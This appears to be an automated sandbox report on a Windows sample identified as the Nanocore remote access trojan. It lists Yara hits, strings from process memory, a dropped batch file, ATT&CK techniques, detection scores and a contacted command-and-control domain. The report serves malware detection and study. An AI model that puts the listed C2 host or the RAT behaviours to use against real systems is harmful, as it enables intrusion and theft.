Source: wIQLBHYbqz.exe, 00000000.00000002.615093463.0000000001A10000.00000002.00020000.sdmp, RegAsm.exe, 0000000D.00000002.611903455.0000000001700000.00000002.00020000.sdmp, RMActivate_isv.exe.bat, 0000000E.00000002.615012630.0000000001B90000.00000002.00020000.sdmp, RegAsm.exe, 00000016.00000002.611132272.00000000015E0000.00000002.00020000.sdmp	Binary or memory string: &Program Manager
Source: wIQLBHYbqz.exe, 00000000.00000002.615093463.0000000001A10000.00000002.00020000.sdmp, RegAsm.exe, 0000000D.00000002.611903455.0000000001700000.00000002.00020000.sdmp, RMActivate_isv.exe.bat, 0000000E.00000002.615012630.0000000001B90000.00000002.00020000.sdmp, RegAsm.exe, 00000016.00000002.611132272.00000000015E0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: RMActivate_isv.exe.bat, 0000000E.00000002.616207272.0000000003550000.00000004.00000001.sdmp	Binary or memory string: [CLASS:Progman]
Source: RegAsm.exe, 0000000D.00000002.611058214.0000000001440000.00000004.00000020.sdmp	Binary or memory string: GrProgram Managerl
Source: RegAsm.exe, 0000000D.00000002.611058214.0000000001440000.00000004.00000020.sdmp	Binary or memory string: Program Manager>

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\wIQLBHYbqz.exe

Code function: 0_2_004350D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004350D7

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 13_2_02C1AF9A GetUserNameW,

13_2_02C1AF9A

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.39cb008.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b74629.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40d2a4d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40ce424.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.42495ee.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40ce424.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.3918578.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cb008.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.424e424.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.38c4300.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.424e424.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.4252a4d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40c95ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35d3428.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.611621495.0000000004081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wIQLBHYbqz.exe PID: 4904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RMActivate_isv.exe.bat PID: 6788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7040, type: MEMORYSTR

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: wIQLBHYbqz.exe, 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RMActivate_isv.exe.bat, 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 22.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.39cb008.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b74629.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40d2a4d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40ce424.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.42495ee.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.3918578.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.5b70000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40ce424.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.3918578.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cb008.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.39cb008.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.RMActivate_isv.exe.bat.16e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.38c4300.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.424e424.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.38c4300.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cb008.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35a0a20.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.424e424.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.4252a4d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wIQLBHYbqz.exe.14a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.3668768.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RegAsm.exe.40c95ee.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wIQLBHYbqz.exe.39cbe78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35d3428.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.35d3428.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.RMActivate_isv.exe.bat.356e018.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.617258087.0000000005B70000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.581083346.0000000003668000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.453308954.000000000399F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.611459498.0000000003081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580718643.0000000003611000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.452029104.0000000003975000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.614749797.00000000016E2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.614883445.00000000014A2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.609808438.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.609719074.0000000000402000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580844038.0000000003B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.617706572.0000000003910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.592051979.0000000003562000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580617027.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450606191.0000000004911000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.615169994.0000000004247000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.617309688.0000000003893000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580586671.000000000369C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.611621495.0000000004081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.580975519.000000000363C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.450818264.000000000391C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.466877574.00000000039B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.618062231.0000000003997000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.618678183.0000000004910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wIQLBHYbqz.exe PID: 4904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RMActivate_isv.exe.bat PID: 6788, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7040, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_0556247A bind,		13_2_0556247A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 13_2_05562428 bind,		13_2_05562428

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Startup Items1	Startup Items1	Disable or Modify Tools1	Input Capture31	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	DLL Side-Loading1	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture31	Exfiltration Over Bluetooth	Remote Access Software1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Registry Run Keys / Startup Folder2	Access Token Manipulation1	Obfuscated Files or Information1	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection212	Software Packing21	NTDS	System Information Discovery14	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol11	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder2	DLL Side-Loading1	LSA Secrets	Security Software Discovery21	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading11	Cached Domain Credentials	Virtualization/Sandbox Evasion31	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion31	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation1	Proc Filesystem	Application Window Discovery11	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection212	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
wIQLBHYbqz.exe	69%	Virustotal		Browse
wIQLBHYbqz.exe	63%	Metadefender		Browse
wIQLBHYbqz.exe	80%	ReversingLabs	Win32.Trojan.Skeeyah
wIQLBHYbqz.exe	100%	Avira	HEUR/AGEN.1100005

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Gfxv2_0\RMActivate_isv.exe.bat	100%	Avira	HEUR/AGEN.1100005

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.wIQLBHYbqz.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1100005	Download File
22.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
13.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
13.2.RegAsm.exe.5b70000.6.unpack	100%	Avira	TR/NanoCore.fadte	Download File
14.0.RMActivate_isv.exe.bat.400000.0.unpack	100%	Avira	HEUR/AGEN.1100005	Download File
14.2.RMActivate_isv.exe.bat.16e0000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
0.2.wIQLBHYbqz.exe.14a0000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
0.0.wIQLBHYbqz.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1100005	Download File
14.2.RMActivate_isv.exe.bat.400000.0.unpack	100%	Avira	HEUR/AGEN.1100005	Download File

Domains

Source	Detection	Scanner	Label	Link
megida.hopto.org	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
	0%	Avira URL Cloud	safe
megida.hopto.org	0%	Avira URL Cloud	safe
http://checkip.dyndns.orglTime	0%	Avira URL Cloud	safe
https://api.ipify.orgDi	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
megida.hopto.org	0.0.0.0	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
	true	Avira URL Cloud: safe	low
megida.hopto.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.orglTime	wIQLBHYbqz.exe, 00000000.00000002.614810428.0000000000FFB000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org	RMActivate_isv.exe.bat, 0000000E.00000002.615594870.0000000003129000.00000004.00000001.sdmp	false		high
http://bot.whatismyipaddress.com	wIQLBHYbqz.exe, 00000000.00000002.616258371.00000000030B4000.00000004.00000001.sdmp	false		high
https://api.ipify.orgDi	wIQLBHYbqz.exe, 00000000.00000002.616316017.00000000030D3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.myexternalip.com/raw	wIQLBHYbqz.exe, 00000000.00000002.614810428.0000000000FFB000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483799
Start date:	15.09.2021
Start time:	13:55:05
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	wIQLBHYbqz (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/3@18/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.5% (good quality ratio 0.5%) Quality average: 82.7% Quality standard deviation: 10.4%
HCA Information:	Failed
